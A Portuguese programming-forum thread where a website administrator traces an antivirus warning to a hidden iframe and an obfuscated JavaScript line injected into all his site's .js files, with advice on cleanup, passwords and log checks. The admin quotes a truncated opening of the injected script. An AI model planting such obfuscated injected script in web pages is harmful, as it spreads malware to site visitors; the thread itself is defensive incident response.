Ir para o conteúdo
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

fil79

alerta segurança

Mensagens Recomendadas

fil79

Boas

Ao aceder a um site que faço agestão aparece a seguinte mensagem de alerta do AVG:

"EXPLOIT LINK TO KNOW EXPLOIT SITE"... que tipo de ameaça se trata e como resolver?

Desde já agradeço


MCITP-MCTS-MCP

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
softklin

Nem é favorável ao hacker que a página esteja visivelmente alterada. Essa iframe, através de CSS, não é visivel no browser. A solução passa por remover essa linha. Se estiver relacionado com o problema do outro tópico, convém alterar as password o mais rapidamente possível e aplicar melhores medidas de segurança.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
fil79

a questão é que não encontro essa linha, se retirar os dois includes (classe mysql e variáveis) o erro desaparece, mas já verifiquei e os ficheiros não têm nada.

Já alterei os dados de acesso FTP.


MCITP-MCTS-MCP

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
softklin

Esse ficheiros estão a fazer include de mais alguns? já viste a própria página HTML (ficheiro que o firebug aponta)? Se conseguires, acho que o Filezilla mostra a data de modificação dos ficheiros, tenta procurar por aí.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
fil79

óptima ideia...descobri vários ficheiros com esta linha:

<script>var f=new Date();try {var H='[';var n='';var P='replace';var kb='';var V=']';var Q=RegExp;var d='g';var o=new String();var eG="";function m(Z,G){var sv=new Array();var Qv=H.........

</script>

ainda estou a limpar...obrigado


MCITP-MCTS-MCP

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
fil79

ok, parece estar tudo...todos os ficheiros javascript tinha a linha mencionada...agora gostaria de saber como aconteceu...eu desconfio que tenha sido alguém que tenha entrada no pc como referi ontem, mas não sei...em relação

a segurança do site eu passei no acutenix e dá dois avisos..para fazer um uograde da versão do PHP e outra do Mysql...de resto não aparece nada de XSS ou outro...


MCITP-MCTS-MCP

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
fil79

há um dado muito interessante: todos os ficheiros .js tinham a tal linha e constato no filezilla que o upload é feito em minutos certos...um grupo de ficheiros é enviado à 13h 28.00, o segundo às 13h 29.00, etc...suponho que tenha sido um software


MCITP-MCTS-MCP

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
softklin

Também concluo que se trate de um processo automatizado, com essa informação que dás.

Dizes ainda que tens vários websites, e que ambos foram atacados. Verifica que software estás a correr, compara as semelhanças dos ataques, e ainda o relatório de acessos do servidor WWW para verificar "picos" de páginas acedidas. Uma página acedida muitas vezes pelo mesmo computador pode significar que alguém andou a experimentar algo. A vulnerabilidade pode estar aí.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
softklin

Provavelmente será mais difundir malware, visto que incluíram aquela iframe com o website malicioso. É muito comum acontecer a websites que esteja no topo de pesquisas do Google, por exemplo, é uma técnica chamada blackhat seo.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora

×

Aviso Sobre Cookies

Ao usar este site você aceita os nossos Termos de Uso e Política de Privacidade. Este site usa cookies para disponibilizar funcionalidades personalizadas. Para mais informações visite esta página.